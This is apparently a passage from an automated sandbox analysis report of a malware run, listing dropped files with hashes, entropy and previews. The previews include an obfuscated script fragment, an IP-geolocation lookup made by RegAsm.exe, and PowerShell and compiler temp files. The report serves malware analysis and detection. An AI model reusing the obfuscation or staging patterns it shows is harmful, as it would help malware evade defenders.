                                                                                                                                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .p.l.a.t.i.r.r.o.s.t.r.o.(.a.r.g.i.l.l.i.t.a.,. .s.o.c.r.a.t.i.c.a.m.e.n.t.e.,. .e.s.f.e.n.o.i.d.e.,. .g.a.l.l.i.n.h.e.i.r.a.,. .a.l.a.b.a.r.d.i.n.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .e.s.f.e.n.o.i.d.e...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                    Entropy (8bit):5.013811273052389
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                                                                                                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                                                                                                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                                                                                                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\124D361A.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2342852
                                                                                                                                                                                                                    Entropy (8bit):2.6417290025884554
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                                                    MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                                                    SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                                                    SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                                                    SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5044CFE0.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2342852
                                                                                                                                                                                                                    Entropy (8bit):2.6417290025884554
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                                                    MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                                                    SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                                                    SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                                                    SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\513B20EE.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):76472
                                                                                                                                                                                                                    Entropy (8bit):3.025081600163608
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                                                                                                    MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                                                                                                    SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                                                                                                    SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                                                                                                    SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7607AB2C.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):884312
                                                                                                                                                                                                                    Entropy (8bit):1.2944965349348616
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                                                                                                    MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                                                                                                    SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                                                                                                    SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                                                                                                    SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB31CE61.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8084
                                                                                                                                                                                                                    Entropy (8bit):2.570503528684488
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                                                                                                    MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                                                                                                    SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                                                                                                    SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                                                                                                    SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E65D8017.emf

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):38272
                                                                                                                                                                                                                    Entropy (8bit):2.8200425031385645
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                                                                                                    MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                                                                                                    SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                                                                                                    SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                                                                                                    SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2saljapr.gmj.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2znmg1t3.ibd.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\35bqgywr.qx3.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4q1xhq04.kp1.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES3ED5.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:23:47 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1328
                                                                                                                                                                                                                    Entropy (8bit):4.001653622469839
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:Hbe9E2U6FQXdH2wKdNWI+ycuZhNjakSlPNnqSqd:PJ1Kd41ulja3/qSK
                                                                                                                                                                                                                    MD5:71643CF761D7FB83465D624C6203CB27
                                                                                                                                                                                                                    SHA1:7FEC9F87AE24BA35235BD0957AD5C1C75D105796
                                                                                                                                                                                                                    SHA-256:9E97171FCC476A7F394252E8CFE830DAEB43BECD36801FDC99E4170ECA61CC18
                                                                                                                                                                                                                    SHA-512:6F5F96E853DDFC711AB54A8C76A77D3A974B22BA5FB320FC0E17D8C8381866B1ABB44E822C1C08C9CCCF1C669E1C3D8DFE08A5E8FE841AFC5C9E4A7BB8E91C3D
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:L...c2.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP...............u..'.Z.<..7@............4.......C:\Users\user\AppData\Local\Temp\RES3ED5.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.v.r.r.k.y.h.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES87A7.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:24:06 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1328
                                                                                                                                                                                                                    Entropy (8bit):4.00217393375807
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:Hrke9EurCqcdHdsfwKdNWI+ycuZhNPZakSkuPNnqSqd:VrCqc9soKd41ulPZa3kyqSK
                                                                                                                                                                                                                    MD5:546545F4C4EAD35E2A5C5DBCBA5515CB
                                                                                                                                                                                                                    SHA1:35C623A77A194B95DEE304B178B2B5364AEF01C4
                                                                                                                                                                                                                    SHA-256:BC497967C2222323FCCF7EA966AA980549AD2722B8941152900D1C4198091F43
                                                                                                                                                                                                                    SHA-512:905D4A1238BD9348A5FA1DB5BEF94B4C666F113BF6BFBCCA66470D417B7C6974D42B6731F95A3B12C2D7ED09A6F38FF28A7EE82E622696B55FFA9D262DF344DD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:L...v2.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP................J..`......X...........4.......C:\Users\user\AppData\Local\Temp\RES87A7.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.k.z.g.b.m.k.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\appvxtgv.lsd.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhv8392.tmp

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x129d030b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):21037056
                                                                                                                                                                                                                    Entropy (8bit):1.139281788866674
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24576:QP1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:QPEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                                                    MD5:1ACEC35C957DE75D08731D0109237C0E
                                                                                                                                                                                                                    SHA1:FA322CA2E573A11157A7413CF5E34CE641C69049
                                                                                                                                                                                                                    SHA-256:85CA20A86AAF382B777B750164944A8050E0B2FE2D9D4F995758D2834F72FD0D
                                                                                                                                                                                                                    SHA-512:88927487CD7BBB6AD88A41D48EC7A3C04C7380A48357BA845C93CEDBC32BE502883D9FC2E38C7F2A6CCFEBFC73AF5734C0B433E6D88D6B94B7EFDA61A011B5BC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....... ........................u..............................;:...{..%....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ejnsb2ny.u3c.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\htl32eqc.mge.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\jfaasddkn

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..

